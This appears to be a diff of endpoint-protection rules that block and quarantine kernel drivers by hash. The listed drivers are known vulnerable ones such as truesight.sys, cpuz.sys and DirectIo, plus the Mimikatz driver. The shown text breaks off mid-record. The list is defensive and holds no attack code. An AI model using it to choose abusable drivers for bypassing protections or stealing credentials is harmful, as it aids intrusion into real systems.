"type": "hash", + "value": "6fc0c630eb1778687bc1eb56a4b735b1ad39f21b607e5e15544191b8ef8b5fa4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "205c3118-5668-5a16-a634-3d557bb910e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.970677Z", + "creation_date": "2026-03-23T11:45:29.970680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970687Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da5135871e9e0004bb60d0be31f8d96988f9b82025abccadfd87c937df22686b", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2064be61-c105-5f1b-a7be-76852e4c4653", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616095Z", + "creation_date": "2026-03-23T11:45:29.616097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8797d9afc7a6bb0933f100a8acbb5d0666ec691779d522ac66c66817155b1c0d", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2070dbe7-d41a-5595-80c3-2e31c5675829", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481785Z", + "creation_date": "2026-03-23T11:45:30.481787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df96d844b967d404e58a12fc57487abc24cd3bd1f8417acfe1ce1ee4a0b0b858", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "207e873f-2466-5b0c-ab29-636013f5cc7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145187Z", + 
"creation_date": "2026-03-23T11:45:32.145189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "981d03e19f14de0ccffef8fa974797d9cdfef6dafc7349d9bbf27434dc16dede", + "comment": "Malicious Kernel Driver (aka driver_981d03e1.sys) [https://www.loldrivers.io/drivers/1106fe7a-b78b-4edf-85c0-6208979f380b/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "208270f5-4aef-5e1b-ad33-ff9421905b42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830598Z", + "creation_date": "2026-03-23T11:45:30.830600Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830605Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9d76e1257b1cfdb8028809f1cf5da0bcbb33d07deedc7e95c5953dd3f195e1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2083c1bb-1f44-55f1-9dc0-665e87b26e90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810681Z", + "creation_date": "2026-03-23T11:45:31.810683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810688Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54467b895627b5b6abb457ba20fe497244d152cae3881a35ea30231f09dde0a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2097b4cf-7433-575b-8d0f-abbc04f187b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143024Z", + "creation_date": "2026-03-23T11:45:32.143026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:32.143032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ede9a3858a12d5ddea21a310e5721bf86c2248539f42c9e0c3c29ae5b0148ba5", + "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "209f285a-1d37-5d25-af91-0eb03e16efd2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474445Z", + "creation_date": "2026-03-23T11:45:30.474448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474457Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2145851bdcbf8419f09fd7470422dd56be1b415b15f39f0632bdd797cf500b36", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20a147ce-5f18-5f72-9002-144eecb11455", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151887Z", + "creation_date": "2026-03-23T11:45:31.151891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151900Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f8b32786de3bf22e92144ed115b6800e03568944fe95699b9002db04e13a20a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20a20d07-6896-5ce7-8679-08757e3f90ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971390Z", + "creation_date": "2026-03-23T11:45:29.971394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8fe9828bea83adc8b1429394db7a556a17f79846ad0bfb7f242084a5c96edf2a", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20a23836-f4df-5dda-88dd-5fb75db9bbdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485038Z", + "creation_date": "2026-03-23T11:45:31.485042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73fcab1ad989ed08cf3c054a29b474fe5a39b1fb145ca34decd553433bff8210", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20b6dda7-f766-5a2f-b985-444b9ea6f6ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494023Z", + "creation_date": "2026-03-23T11:45:31.494026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494036Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aee1f887d981f49b4b6e0d60c195b6a96da3f1ff005ad78c11c4ab35ae9f983f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20b8dffb-7297-5156-91a6-849a46ea10d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615186Z", + "creation_date": "2026-03-23T11:45:29.615188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b08a501124d13262c86889617071743521aeefc2d77f678d541aa8dbad52992", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, 
NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20be698d-bd18-5449-a0c4-73da695ab941", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979675Z", + "creation_date": "2026-03-23T11:45:29.979677Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0801ade5de44b65afb8c275e11e4d766ae64af1a5740ad4f1db1acc4e088774", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20c54db1-d889-57e5-9206-e0f68a9851f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489403Z", + "creation_date": "2026-03-23T11:45:31.489406Z", + "enabled": true, 
+ "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c9e1cdedf76956540458a3dbf153c833e54201deea1ab22c08ad6725ed9f19a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20d24f85-d917-5141-8d3e-e34155d9ef51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830132Z", + "creation_date": "2026-03-23T11:45:30.830134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89021b58a0f068b2d54c7136583224a43a33e2547b5a1aa40a871d9f9731ef73", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20d378f6-b625-51fc-924c-a9eae74ae3bb", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146367Z", + "creation_date": "2026-03-23T11:45:31.146369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60cfdb1641547fa688a114639b6bff13742fc8bb61b85c30d2bf9952c0e3359f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20d5f906-da44-5d2f-9b2c-12d47ab3c975", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817035Z", + "creation_date": "2026-03-23T11:45:30.817037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.817042Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a0b10a9e662a0b0eeb951ffd2a82cc71d30939a78daebd26b3f58bb24351ac9", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20e06026-add4-5071-b373-9b0a5cbcac7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831918Z", + "creation_date": "2026-03-23T11:45:30.831920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6c32bb6d976f5f7125d01f30f6e76d0fb6e4c5a33d1bba1d79e30f7dec52274", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20e5e827-9eb5-5bb0-a3af-cbdb55d8620a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453283Z", + "creation_date": "2026-03-23T11:45:30.453286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a15325e9e6b8e4192291deb56c20c558dde3f96eb682c6e90952844edb984a00", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "20f4b53d-3503-52ad-a6ca-74263f59004c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148809Z", + "creation_date": "2026-03-23T11:45:31.148812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f909d9bf3f0974d6ecda2956d7c2c3c39e693c01550bebed05ee1cf02091eff", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2103dd29-832b-557e-a9d0-b8fc4341aa85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622437Z", + "creation_date": "2026-03-23T11:45:29.622441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622447Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f9530c94b689f39cc83377d76979d443275012e022782a600dcb5cad4cca6aa", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "210706cb-6d84-563b-b5c5-14fe6c91aa97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819777Z", + "creation_date": "2026-03-23T11:45:30.819779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819785Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77da3e8c5d70978b287d433ae1e1236c895b530a8e1475a9a190cdcc06711d2f", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21103903-e415-5430-ae82-59bbd377f7b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611062Z", + "creation_date": "2026-03-23T11:45:29.611064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36729c2c714e05ebf9bc7262bc7f0d5d25d9dc9c8e0c4fdce27143bbdd9d9aa7", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": 
